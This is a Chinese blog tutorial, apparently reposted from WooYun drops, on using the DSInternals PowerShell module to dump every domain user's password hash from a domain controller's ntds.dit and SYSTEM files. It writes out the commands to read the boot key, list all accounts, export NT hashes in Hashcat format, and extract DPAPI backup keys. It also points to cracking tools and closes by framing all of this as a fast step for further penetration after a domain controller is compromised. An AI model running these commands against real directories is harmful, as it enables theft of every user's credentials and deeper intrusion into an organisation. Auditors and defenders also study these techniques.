欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

利用Powershell快速导出域控所有用户Hash

程序员文章站 2023-12-30 15:20:22
...

三好学生 · 2015/11/04 10:28

0x00 前言


之前在《导出当前域内所有用户hash的技术整理》中测试了5种导出域内所有用户hash的方法,经过这一段时间的学习和实践,找到了新的方法,也很有效,分享给大家。

0x01 简介


对于离线导出域控所有用户Hash,NTDSXtract依旧是主流

优点:

获取信息全面
稳定,上G的ntds.dit文件也可以正常解析
复制代码

缺点:

耗时,对于大型数据库,解析效率低
不支持内置索引,对于大型数据库,查找特定对象效率低
运行在Linux,不支持windows
无法修改ntds的数据库
复制代码

但就在最近,能够综合解决上述问题的工具出现了,经过一段时间的测试和使用,个人认为已经可以替代NTDSXtract

下面就介绍一下今天的主角——DSInternals PowerShell Module

下载地址:

DSInternals PowerShell Module:
www.dsinternals.com/wp-content/…

《导出当前域内所有用户hash的技术整理》:
drops.wooyun.org/tips/6617

0x02 DSInternals PowerShell Module介绍


1、版本

v2.8
复制代码

2、适用环境

支持系统:

Windows Server 2012 R2
Windows Server 2008 R2
Windows 10 64-bit
Windows 8.1 64-bit
Windows 7 64-bit
(以上为官方说明)
复制代码

注:

实际测试32位也可以
Windows 7 、Windows Server 2008 R2默认环境下PowerShell版本2.0,不支持
PowerShell版本需要升级至3.0
复制代码

软件版本:

- Windows PowerShell 3+
- .NET Framework 4.5+
(此为官方说明)
复制代码

注:

实测.NET Framework 4.0即可
复制代码

3、安装方法

1、PowerShell 5.0:

Install-Module DSInternals
复制代码

2、PowerShell 3.0、4.0

解压压缩包
cd C:\test\DSInternals
Import-Module .\DSInternals
复制代码

4、功能模块

1、在线操作活动目录数据库

Get-ADReplAccount:读取账户信息
Set-SamAccountPasswordHash:设置账户的NTHash和LMHash
Get-ADReplBackupKey:读取DPAPI backup keys
复制代码

2、离线操作活动目录数据库

Get-ADDBAccount:从ntds.dit文件读取账户信息
Get-BootKey:从SYSTEM文件读取BootKey
Get-ADDBBackupKey::从ntds.dit文件读取DPAPI backup keys
Add-ADDBSidHistory:向ntds.dit文件添加SIDHistory信息
Set-ADDBPrimaryGroup:修改ntds.dit文件的primaryGroupId属性
Get-ADDBDomainController:从ntds.dit文件读取域控信息,包括domain name, domain SID, DC name and DC site.
Set-ADDBDomainController:向ntds.dit文件添加域控信息
Get-ADDBSchemaAttribute:从ntds.dit文件读取AD schema,包括数据表的列名
Remove-ADDBObject:从ntds.dit文件移除特定对象
复制代码

3、 Hash计算

ConvertTo-NTHash:给定密码,计算NT hash
ConvertTo-LMHash:给定密码,计算LM hash
ConvertTo-OrgIdHash:给定密码,计算OrgId hash
复制代码

4、补充

对于Get-ADDBAccount读取到的账户信息,可将其中包含的Hash值按如下格式导出:

HashcatNT:支持Hashcat的NT hash
HashcatLM:支持Hashcat的LM hash
JohnNT:支持John the Ripper的NT hash
JohnLM:支持John the Ripper的LM hash
Ophcrack:支持Ophcrack的NT hash、LM hash
复制代码

注:

列出以上三款Hash**工具的地址:
Hashcat:
http://hashcat.net/oclhashcat/
John the Ripper:
http://www.openwall.com/john/
Ophcrack:
http://ophcrack.sourceforge.net/
复制代码

0x03 测试环境


操作系统:

win10 x64
复制代码

Powershell版本:

v5
复制代码

需要文件:

ntds.dit
SAM
SYSTEM
复制代码

文件来源:

域控:server2008R2
复制代码

导出方法:

vssown.vbs或ShadowCopy(之前文章有介绍,导出过程略过)
复制代码

0x04 实际测试


1、安装配置

下载DSInternals PowerShell Module

允许Powershell执行脚本:

Set-ExecutionPolicy Unrestricted
复制代码

安装DSInternals:

Install-Module -Name DSInternals
复制代码

导入DSInternals:

Import-Module DSInternals
复制代码

2、获取所有账户信息

$key = Get-BootKey -SystemHivePath 'C:\Users\a\Desktop\a\SYSTEM'

Get-ADDBAccount -All -DBPath 'C:\Users\a\Desktop\a\ntds.dit' -BootKey $key 
复制代码

如图

3、获取指定账户信息

$key = Get-BootKey -SystemHivePath 'C:\Users\a\Desktop\a\SYSTEM'

Get-ADDBAccount -DistinguishedName 'CN=krbtgt,CN=Users,DC=test,DC=local'  -DBPath 'C:\Users\a\Desktop\a\ntds.dit' -BootKey $key
复制代码

如图

4、导出支持Hashcat的NT hash

Get-ADDBAccount -All -DBPath 'C:\Users\a\Desktop\a\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File hashes.txt
复制代码

如图

5、导出DPAPI backup keys

(1)获得BootKey

Get-BootKey -SystemHiveFilePath 'C:\Users\a\Desktop\a\SYSTEM'
得到c76034ff820edbc012308a258faf3d26
复制代码

如图

(2)解密得到DPAPI backup keys

Get-ADDBBackupKey -DBPath 'C:\Users\a\Desktop\a\ntds.dit'  -BootKey c76034ff820edbc012308a258faf3d26 |  Format-List
复制代码

(3)导出到文件

Get-ADDBBackupKey -DBPath 'C:\Users\a\Desktop\a\ntds.dit' -BootKey c76034ff820edbc012308a258faf3d26 | Save-DPAPIBlob -DirectoryPath .\Keys
复制代码

6、Hash计算

$pwd = ConvertTo-SecureString 'TestTest' -AsPlainText -Force
ConvertTo-NTHash $pwd
ConvertTo-LMHash $pwd
ConvertTo-OrgIdHash -NTHash 'd280553f0103f2e643406517296e7582'
复制代码

如图

0x05 小结


随着技术的发展,效率一直在提高

在获取域控权限下,导出所有用户hash的方法越来越简便,当域控被攻陷后,可以在很短的时间内提取出有用的信息用来进一步渗透,内网渗透将会越来越有趣。

本文由三好学生原创并首发于乌云drops,转载请注明

上一篇:

下一篇: